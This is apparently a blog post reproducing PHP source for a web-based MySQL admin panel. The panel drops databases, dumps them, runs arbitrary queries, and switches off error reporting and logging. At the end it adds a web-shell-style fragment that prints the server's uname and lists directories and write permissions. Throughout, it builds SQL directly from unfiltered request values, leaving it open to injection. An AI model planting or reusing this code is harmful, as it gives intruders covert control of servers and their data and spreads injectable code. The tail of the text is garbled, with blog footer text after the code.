<td align=center>O</td>
<td align=center>O</td>
<td> </td>
<td align=center>O</td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="DATE" '; if( $type == "date" ) echo "checked";echo '>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="DATETIME" '; if( $type == "datetime" ) echo "checked";echo '>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 23:59:59, YYYY-MM-DD HH:MM:SS)</td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="TIMESTAMP" '; if( $type == "timestamp" ) echo "checked";echo '>TIMESTAMP (1970-01-01 00:00:00 ~ 2106..., YYYYMMDD[HH[MM[SS]]])</td>
<td align=center>O</td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="TIME" '; if( $type == "time" ) echo "checked";echo '>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="YEAR" '; if( $type == "year" ) echo "checked";echo '>YEAR (1901 ~ 2155, 0000, YYYY)</td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="CHAR" '; if( $type == "char" ) echo "checked";echo '>CHAR</td>
<td align=center>O</td>
<td> </td>
<td> </td>
<td> </td>
<td align=center>O</td>
</tr>
<tr>
<td><input type=radio name=type value="VARCHAR" '; if( $type == "varchar" ) echo "checked";echo '>VARCHAR</td>
<td align=center>O</td>
<td> </td>
<td> </td>
<td> </td>
<td align=center>O</td>
</tr>
<tr>
<td><input type=radio name=type value="TINYTEXT" '; if( $type == "tinytext" ) echo "checked";echo '>TINYTEXT (0 ~ 255)</td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="TEXT" '; if( $type == "text" ) echo "checked";echo '>TEXT (0 ~ 65535)</td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="MEDIUMTEXT" '; if( $type == "mediumtext" ) echo "checked";echo '>MEDIUMTEXT (0 ~ 16777215)</td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="LONGTEXT" '; if( $type == "longtext" ) echo "checked";echo '>LONGTEXT (0 ~ 4294967295)</td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="TINYBLOB" '; if( $type == "tinyblob" ) echo "checked";echo '>TINYBLOB (0 ~ 255)</td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="BLOB" '; if( $type == "blob" ) echo "checked";echo '>BLOB (0 ~ 65535)</td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="MEDIUMBLOB" '; if( $type == "mediumblob" ) echo "checked";echo '>MEDIUMBLOB (0 ~ 16777215)</td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="LONGBLOB" '; if( $type == "longblob" ) echo "checked";echo '>LONGBLOB (0 ~ 4294967295)</td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="ENUM" '; if( $type == "enum" ) echo "checked";echo '>ENUM</td>
<td colspan=5><center>value list</center></td>
</tr>
<tr>
<td><input type=radio name=type value="SET" '; if( $type == "set" ) echo "checked";echo '>SET</td>
<td colspan=5><center>value list</center></td>
</tr>
</table>
<table>
<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value list (ex: \'apple\', \'orange\', \'banana\') </th></tr>
<tr>
<td align=center><input type=text size=4 name=M '; if( $M != "" ) echo "value=$M";echo '></td>
<td align=center><input type=text size=4 name=D '; if( $D != "" ) echo "value=$D";echo '></td>
<td align=center><input type=checkbox name=unsigned value="UNSIGNED" '; if( strpos( $fieldtype, "unsigned" ) ) echo "checked";echo '></td>
<td align=center><input type=checkbox name=zerofill value="ZEROFILL" '; if( strpos( $fieldtype, "zerofill" ) ) echo "checked";echo '></td>
<td align=center><input type=checkbox name=binary value="BINARY" '; if( strpos( $fieldtype, "binary" ) ) echo "checked";echo '></td>
<td align=center><input type=text size=60 name=valuelist '; if( $valuelist != "" ) echo "value=\"$valuelist\"";echo '></td>
</tr>
</table>
<h3>Flags</h3>
<table>
<tr><th>not null</th><th>default value</th><th>auto increment</th><th>primary key</th></tr>
<tr>
<td align=center><input type=checkbox name=not_null value="NOT NULL" '; if( $fieldnull != "YES" ) echo "checked";echo '></td>
<td align=center><input type=text name=default_value '; if( $fielddefault != "" ) echo "value=$fielddefault";echo '></td>
<td align=center><input type=checkbox name=auto_increment value="AUTO_INCREMENT" '; if( $fieldextra == "auto_increment" ) echo "checked";echo '></td>
<td align=center><input type=checkbox name=primary_key value="PRIMARY KEY" '; if( $fieldkey == "PRI" ) echo "checked";echo '></td>
</tr>
</table>
<p>';
if( $cmd == "add" )
echo "<input type=submit value='Add Field'>\n";
else if( $cmd == "edit" )
echo "<input type=submit value='Edit Field'>\n";
echo "<input type=button value=Cancel onClick='history.back()'>\n";
echo "</form>\n";
}
function manageField_submit( $cmd ) {
global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, $PHP_SELF, $queryStr, $errMsg,
$M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, $auto_increment, $primary_key, $valuelist;
if( $cmd == "add" )
$queryStr = "ALTER TABLE $tablename ADD $name ";
else if( $cmd == "edit" )
$queryStr = "ALTER TABLE $tablename CHANGE $old_name $name ";
if( $M != "" )
if( $D != "" )
$queryStr .= "$type($M,$D) ";
else
$queryStr .= "$type($M) ";
else if( $valuelist != "" ) {
$valuelist = stripslashes( $valuelist );
$queryStr .= "$type($valuelist) ";
} else
$queryStr .= "$type ";
$queryStr .= "$unsigned $zerofill $binary ";
if( $default_value != "" )
$queryStr .= "DEFAULT '$default_value' ";
$queryStr .= "$not_null $auto_increment";
mysql_select_db( $dbname, $mysqlHandle );
mysql_query( $queryStr, $mysqlHandle );
$errMsg = mysql_error();
// key change
$keyChange = false;
$result = mysql_query( "SHOW KEYS FROM $tablename" );
$primary = "";
while( $row = mysql_fetch_array($result) )
if( $row["Key_name"] == "PRIMARY" ) {
if( $row[Column_name] == $name )
$keyChange = true;
else
$primary .= ", $row[Column_name]";
}
if( $primary_key == "PRIMARY KEY" ) {
$primary .= ", $name";
$keyChange = !$keyChange;
}
$primary = substr( $primary, 2 );
if( $keyChange == true ) {
$q = "ALTER TABLE $tablename DROP PRIMARY KEY";
mysql_query( $q );
$queryStr .= "<br>\n" . $q;
$errMsg .= "<br>\n" . mysql_error();
$q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )";
mysql_query( $q );
$queryStr .= "<br>\n" . $q;
$errMsg .= "<br>\n" . mysql_error();
}
viewSchema();
}
function dropField() {
global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
$queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
mysql_select_db( $dbname, $mysqlHandle );
mysql_query( $queryStr , $mysqlHandle );
$errMsg = mysql_error();
viewSchema();
}
function viewData( $queryStr ) {
global $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby;
echo "<h1>Data in Table</h1>\n";
if( $tablename != "" )
echo "<p class=location>$dbname > $tablename</p>\n";
else
echo "<p class=location>$dbname</p>\n";
$queryStr = stripslashes( $queryStr );
if( $queryStr == "" ) {
$queryStr = "SELECT * FROM $tablename";
if( $orderby != "" )
$queryStr .= " ORDER BY $orderby";
echo "<a href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add Data</a> | \n";
echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
}
$pResult = mysql_db_query( $dbname, $queryStr );
$fieldt = mysql_fetch_field($pResult);
$tablename = $fieldt->table;
$errMsg = mysql_error();
$GLOBALS[queryStr] = $queryStr;
if( $pResult == false ) {
echoQueryResult();
return;
}
if( $pResult == 1 ) {
$errMsg = "Success";
echoQueryResult();
return;
}
echo "<hr>\n";
$row = mysql_num_rows( $pResult );
$col = mysql_num_fields( $pResult );
if( $row == 0 ) {
echo "No Data Exist!";
return;
}
if( $rowperpage == "" ) $rowperpage = 30;
if( $page == "" ) $page = 0;
else $page--;
mysql_data_seek( $pResult, $page * $rowperpage );
echo "<table cellspacing=1 cellpadding=2>\n";
echo "<tr>\n";
for( $i = 0; $i < $col; $i++ ) {
$field = mysql_fetch_field( $pResult, $i );
echo "<th>";
if($action == "viewData")
echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
else
echo "<font style='text-decoration:none;color:#000000;font-size:x-small;'>".$field->name."</font>\n";
echo "</th>\n";
}
echo "<th colspan=2>Action</th>\n";
echo "</tr>\n";
for( $i = 0; $i < $rowperpage; $i++ ) {
$rowArray = mysql_fetch_row( $pResult );
if( $rowArray == false ) break;
echo "<tr>\n";
$key = "";
for( $j = 0; $j < $col; $j++ ) {
$data = $rowArray[$j];
$field = mysql_fetch_field( $pResult, $j );
if( $field->primary_key == 1 )
$key .= "&" . $field->name . "=" . $data;
if( strlen( $data ) > 30 )
$data = substr( $data, 0, 30 ) . "...";
$data = htmlspecialchars( $data );
echo "<td>\n";
echo "$data\n";
echo "</td>\n";
}
if( $key == "" )
echo "<td colspan=2>no Key</td>\n";
else {
echo "<td><a href='$PHP_SELF?action=editData$key&dbname=$dbname&tablename=$tablename'>Edit</a></td>\n";
echo "<td><a href='$PHP_SELF?action=deleteData$key&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
}
echo "</tr>\n";
}
echo "</table>\n";
echo "<font size=2>\n";
if($action == "viewData")
echo "<form action='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename' method=post>\n";
else
echo "<form action='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr' method=post>\n";
echo "<font color=green>\n";
echo ($page+1)."/".(int)($row/$rowperpage+1)." page";
echo "</font>\n";
echo " | ";
if( $page > 0 ) {
if($action == "viewData")
echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page);
else
echo "<a href='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr&page=".($page);
if( $orderby != "" && $action == "viewData")
echo "&orderby=$orderby";
echo "'>Prev</a>\n";
} else
echo "Prev";
echo " | ";
if( $page < ($row/$rowperpage)-1 ) {
if($action == "viewData")
echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page+2);
else
echo "<a href='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr&page=".($page+2);
if( $orderby != "" && $action == "viewData")
echo "&orderby=$orderby";
echo "'>Next</a>\n";
} else
echo "Next";
echo " | ";
if( $row > $rowperpage ) {
echo "<input type=text size=4 name=page>\n";
echo "<input type=submit value='Go'>\n";
}
echo "</form>\n";
echo "</font>\n";
}
function manageData( $cmd ) {
global $mysqlHandle, $dbname, $tablename, $PHP_SELF;
if( $cmd == "add" )
echo "<h1>Add Data</h1>\n";
else if( $cmd == "edit" ) {
echo "<h1>Edit Data</h1>\n";
$pResult = mysql_list_fields( $dbname, $tablename );
$num = mysql_num_fields( $pResult );
$key = "";
for( $i = 0; $i < $num; $i++ ) {
$field = mysql_fetch_field( $pResult, $i );
if( $field->primary_key == 1 )
if( $field->numeric == 1 )
$key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
else
$key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
}
$key = substr( $key, 0, strlen($key)-4 );
mysql_select_db( $dbname, $mysqlHandle );
$pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE $key", $mysqlHandle );
$data = mysql_fetch_array( $pResult );
}
echo "<p class=location>$dbname > $tablename</p>\n";
echo "<form action='$PHP_SELF' method=post>\n";
if( $cmd == "add" )
echo "<input type=hidden name=action value=addData_submit>\n";
else if( $cmd == "edit" )
echo "<input type=hidden name=action value=editData_submit>\n";
echo "<input type=hidden name=dbname value=$dbname>\n";
echo "<input type=hidden name=tablename value=$tablename>\n";
echo "<table cellspacing=1 cellpadding=2>\n";
echo "<tr>\n";
echo "<th>Name</th>\n";
echo "<th>Type</th>\n";
echo "<th>Function</th>\n";
echo "<th>Data</th>\n";
echo "</tr>\n";
$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
$num = mysql_num_rows( $pResult );
$pResultLen = mysql_list_fields( $dbname, $tablename );
for( $i = 0; $i < $num; $i++ ) {
$field = mysql_fetch_array( $pResult );
$fieldname = $field["Field"];
$fieldtype = $field["Type"];
$len = mysql_field_len( $pResultLen, $i );
echo "<tr>";
echo "<td>$fieldname</td>";
echo "<td>".$field["Type"]."</td>";
echo "<td>\n";
echo "<select name=${fieldname}_function>\n";
echo "<option>\n";
echo "<option>ASCII\n";
echo "<option>CHAR\n";
echo "<option>SOUNDEX\n";
echo "<option>CURDATE\n";
echo "<option>CURTIME\n";
echo "<option>FROM_DAYS\n";
echo "<option>FROM_UNIXTIME\n";
echo "<option>NOW\n";
echo "<option>PASSWORD\n";
echo "<option>PERIOD_ADD\n";
echo "<option>PERIOD_DIFF\n";
echo "<option>TO_DAYS\n";
echo "<option>USER\n";
echo "<option>WEEKDAY\n";
echo "<option>RAND\n";
echo "</select>\n";
echo "</td>\n";
$value = htmlspecialchars($data[$i]);
if( $cmd == "add" ) {
$type = strtok( $fieldtype, " (,)\n" );
if( $type == "enum" || $type == "set" ) {
echo "<td>\n";
if( $type == "enum" )
echo "<select name=$fieldname>\n";
else if( $type == "set" )
echo "<select name=$fieldname size=4 multiple>\n";
while( $str = strtok( "'" ) ) {
echo "<option>$str\n";
strtok( "'" );
}
echo "</select>\n";
echo "</td>\n";
} else {
if( $len < 40 )
echo "<td><input type=text size=40 maxlength=$len name=$fieldname></td>\n";
else
echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname></textarea>\n";
}
} else if( $cmd == "edit" ) {
$type = strtok( $fieldtype, " (,)\n" );
if( $type == "enum" || $type == "set" ) {
echo "<td>\n";
if( $type == "enum" )
echo "<select name=$fieldname>\n";
else if( $type == "set" )
echo "<select name=$fieldname size=4 multiple>\n";
while( $str = strtok( "'" ) ) {
if( $value == $str )
echo "<option selected>$str\n";
else
echo "<option>$str\n";
strtok( "'" );
}
echo "</select>\n";
echo "</td>\n";
} else {
if( $len < 40 )
echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\"></td>\n";
else
echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname>$value</textarea>\n";
}
}
echo "</tr>";
}
echo "</table><p>\n";
if( $cmd == "add" )
echo "<input type=submit value='Add Data'>\n";
else if( $cmd == "edit" )
echo "<input type=submit value='Edit Data'>\n";
echo "<input type=button value='Cancel' onClick='history.back()'>\n";
echo "</form>\n";
}
function manageData_submit( $cmd ) {
global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
$pResult = mysql_list_fields( $dbname, $tablename );
$num = mysql_num_fields( $pResult );
mysql_select_db( $dbname, $mysqlHandle );
if( $cmd == "add" )
$queryStr = "INSERT INTO $tablename VALUES (";
else if( $cmd == "edit" )
$queryStr = "REPLACE INTO $tablename VALUES (";
for( $i = 0; $i < $num-1; $i++ ) {
$field = mysql_fetch_field( $pResult );
$func = $GLOBALS[$field->name."_function"];
if( $func != "" )
$queryStr .= " $func(";
if( $field->numeric == 1 ) {
$queryStr .= $GLOBALS[$field->name];
if( $func != "" )
$queryStr .= "),";
else
$queryStr .= ",";
} else {
$queryStr .= "'" . $GLOBALS[$field->name];
if( $func != "" )
$queryStr .= "'),";
else
$queryStr .= "',";
}
}
$field = mysql_fetch_field( $pResult );
if( $field->numeric == 1 )
$queryStr .= $GLOBALS[$field->name] . ")";
else
$queryStr .= "'" . $GLOBALS[$field->name] . "')";
mysql_query( $queryStr , $mysqlHandle );
$errMsg = mysql_error();
viewData( "" );
}
function deleteData() {
global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
$pResult = mysql_list_fields( $dbname, $tablename );
$num = mysql_num_fields( $pResult );
$key = "";
for( $i = 0; $i < $num; $i++ ) {
$field = mysql_fetch_field( $pResult, $i );
if( $field->primary_key == 1 )
if( $field->numeric == 1 )
$key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
else
$key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
}
$key = substr( $key, 0, strlen($key)-4 );
mysql_select_db( $dbname, $mysqlHandle );
$queryStr = "DELETE FROM $tablename WHERE $key";
mysql_query( $queryStr, $mysqlHandle );
$errMsg = mysql_error();
viewData( "" );
}
function fetch_table_dump_sql($table)
{
global $mysqlHandle,$dbname;
mysql_select_db( $dbname, $mysqlHandle );
$query_id = mysql_query("SHOW CREATE TABLE $table",$mysqlHandle);
$tabledump = mysql_fetch_array($query_id, MYSQL_ASSOC);
$tabledump = "DROP TABLE IF EXISTS $table;\n" . $tabledump['Create Table'] . ";\n\n";
echo $tabledump;
// get data
$rows = mysql_query("SELECT * FROM $table",$mysqlHandle);
$numfields=mysql_num_fields($rows);
while ($row = mysql_fetch_array($rows, MYSQL_NUM))
{
$tabledump = "INSERT INTO $table VALUES(";
$fieldcounter = -1;
$firstfield = 1;
// get each field's data
while (++$fieldcounter < $numfields)
{
if (!$firstfield)
{
$tabledump .= ', ';
}
else
{
$firstfield = 0;
}
if (!isset($row["$fieldcounter"]))
{
$tabledump .= 'NULL';
}
else
{
$tabledump .= "'" . mysql_escape_string($row["$fieldcounter"]) . "'";
}
}
$tabledump .= ");\n";
echo $tabledump;
}
@mysql_free_result($rows);
}
function dump() {
global $mysqlHandle, $action, $dbname, $tablename;
if( $action == "dumpTable" ){
header("Content-disposition: filename=$tablename.sql");
header('Content-type: unknown/unknown');
fetch_table_dump_sql($tablename);
echo "\n\n\n";
echo "\r\n\r\n\r\n### $tablename TABLE DUMP COMPLETED ###";
exit;
}else{
header("Content-disposition: filename=$dbname.sql");
header('Content-type: unknown/unknown');
mysql_select_db( $dbname, $mysqlHandle );
$query_id = mysql_query("SHOW tables",$mysqlHandle);
while ($row = mysql_fetch_array($query_id, MYSQL_NUM))
{
fetch_table_dump_sql($row[0]);
echo "\n\n\n";
echo "\r\n\r\n\r\n### $row[0] TABLE DUMP COMPLETED ###";
echo "\n\n\n";
}
echo "\r\n\r\n\r\n### $dbname DATABASE DUMP COMPLETED ###";
exit;
}
}
function utils() {
global $PHP_SELF, $command;
echo "<h1>Utilities</h1>\n";
if( $command == "" || substr( $command, 0, 5 ) == "flush" ) {
echo "<hr>\n";
echo "Show\n";
echo "<ul>\n";
echo "<li><a href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n";
echo "<li><a href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n";
echo "<li><a href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n";
echo "</ul>\n";
echo "Flush\n";
echo "<ul>\n";
echo "<li><a href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n";
if( $command == "flush_hosts" ) {
if( mysql_query( "Flush hosts" ) != false )
echo "<font size=2 color=red>- Success</font>";
else
echo "<font size=2 color=red>- Fail</font>";
}
echo "<li><a href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n";
if( $command == "flush_logs" ) {
if( mysql_query( "Flush logs" ) != false )
echo "<font size=2 color=red>- Success</font>";
else
echo "<font size=2 color=red>- Fail</font>";
}
echo "<li><a href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n";
if( $command == "flush_privileges" ) {
if( mysql_query( "Flush privileges" ) != false )
echo "<font size=2 color=red>- Success</font>";
else
echo "<font size=2 color=red>- Fail</font>";
}
echo "<li><a href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n";
if( $command == "flush_tables" ) {
if( mysql_query( "Flush tables" ) != false )
echo "<font size=2 color=red>- Success</font>";
else
echo "<font size=2 color=red>- Fail</font>";
}
echo "<li><a href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n";
if( $command == "flush_status" ) {
if( mysql_query( "Flush status" ) != false )
echo "<font size=2 color=red>- Success</font>";
else
echo "<font size=2 color=red>- Fail</font>";
}
echo "</ul>\n";
} else {
$queryStr = ereg_replace( "_", " ", $command );
$pResult = mysql_query( $queryStr );
if( $pResult == false ) {
echo "Fail";
return;
}
$col = mysql_num_fields( $pResult );
echo "<p class=location>$queryStr</p>\n";
echo "<hr>\n";
echo "<table cellspacing=1 cellpadding=2 border=0>\n";
echo "<tr>\n";
for( $i = 0; $i < $col; $i++ ) {
$field = mysql_fetch_field( $pResult, $i );
echo "<th>".$field->name."</th>\n";
}
echo "</tr>\n";
while( 1 ) {
$rowArray = mysql_fetch_row( $pResult );
if( $rowArray == false ) break;
echo "<tr>\n";
for( $j = 0; $j < $col; $j++ )
echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n";
echo "</tr>\n";
}
echo "</table>\n";
}
}
function header_html() {
global $PHP_SELF;
echo '
<html>
<head>
<title>MySQL Interface</title>
<style type="text/css">
<!--
p.location {
color: #11bb33;
font-size: small;
}
h1 {
color: #A4A260;
}
th {
background-color: #BDBE42;
color: #FFFFFF;
font-size: x-small;
}
td {
background-color: #DEDFA5;
font-size: x-small;
}
form {
margin-top: 0;
margin-bottom: 0;
}
a {
text-decoration:none;
color: #848200;
font-size:x-small;
}
a:link {
}
a:hover {
background-color:#EEEFD5;
color:#646200;
text-decoration:none
}
//-->
</style>
</head>
<body>
';
}
function footer_html() {
global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME;
echo "<hr>\n";
echo "<font size=2 color=blue>[$USERNAME]</font> - \n";
echo "<a href='$PHP_SELF?action=listDBs'>Database List</a> | \n";
if( $tablename != "" )
echo "<a href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table List</a> | ";
echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n";
echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n";
echo "</font>\n";
echo "</body>\n";
echo "</html>\n";
}
//------------- MAIN ------------- //
error_reporting(0);
ini_set ('display_errors', 0);
ini_set ('log_errors', 0);
if( $action == "logon" || $action == "" || $action == "logout" )
logon();
else if( $action == "logon_submit" )
logon_submit();
else if( $action == "dumpTable" || $action == "dumpDB" ) {
while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
if( $var == "mysql_web_admin_hostname" ) $HOSTNAME = $value;
}
$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
dump();
} else {
while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
if( $var == "mysql_web_admin_hostname" ) $HOSTNAME = $value;
}
echo "<!--";
$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
echo "-->";
if( $mysqlHandle == false ) {
echo "<html>\n";
echo "<head>\n";
echo "<title>MySQL Interface</title>\n";
echo "</head>\n";
echo "<body>\n";
echo "<table width=100% height=100%><tr><td><center>\n";
echo "<h1>Wrong Password!</h1>\n";
echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n";
echo "</center></td></tr></table>\n";
echo "</body>\n";
echo "</html>\n";
} else {
header_html();
if( $action == "listDBs" )
listDatabases();
else if( $action == "createDB" )
createDatabase();
else if( $action == "dropDB" )
dropDatabase();
else if( $action == "listTables" )
listTables();
else if( $action == "createTable" )
createTable();
else if( $action == "dropTable" )
dropTable();
else if( $action == "viewSchema" )
viewSchema();
else if( $action == "query" )
viewData( $queryStr );
else if( $action == "addField" )
manageField( "add" );
else if( $action == "addField_submit" )
manageField_submit( "add" );
else if( $action == "editField" )
manageField( "edit" );
else if( $action == "editField_submit" )
manageField_submit( "edit" );
else if( $action == "dropField" )
dropField();
else if( $action == "viewData" )
viewData( "" );
else if( $action == "addData" )
manageData( "add" );
else if( $action == "addData_submit" )
manageData_submit( "add" );
else if( $action == "editData" )
manageData( "edit" );
else if( $action == "editData_submit" )
manageData_submit( "edit" );
else if( $action == "deleteData" )
deleteData();
else if( $action == "utils" )
utils();
mysql_close( $mysqlHandle);
footer_html();
}
}
?>
<p align="left"><b>uname -a: <?php echo wordwrap(php_uname(),90,"<br>",1); ?></b> </p>
<?php
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
$d = str_replace("\\\\","\\",$d);
$dispd = htmlspecialchars($d);
$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
$i = 0;
foreach($pd as $b)
{
$t = "";
$j = 0;
foreach ($e as $r)
{
$t.= $r.DIRECTORY_SEPARATOR;
if ($j == $i) {break;}
$j++;
}
echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
$i++;
}
echo " ";
if (is_writable($d))
{
$wd = TRUE;
$wdt = "<font color=green>[ ok ]</font>";
echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
}
?>
Subscribe to:
Posts (Atom)
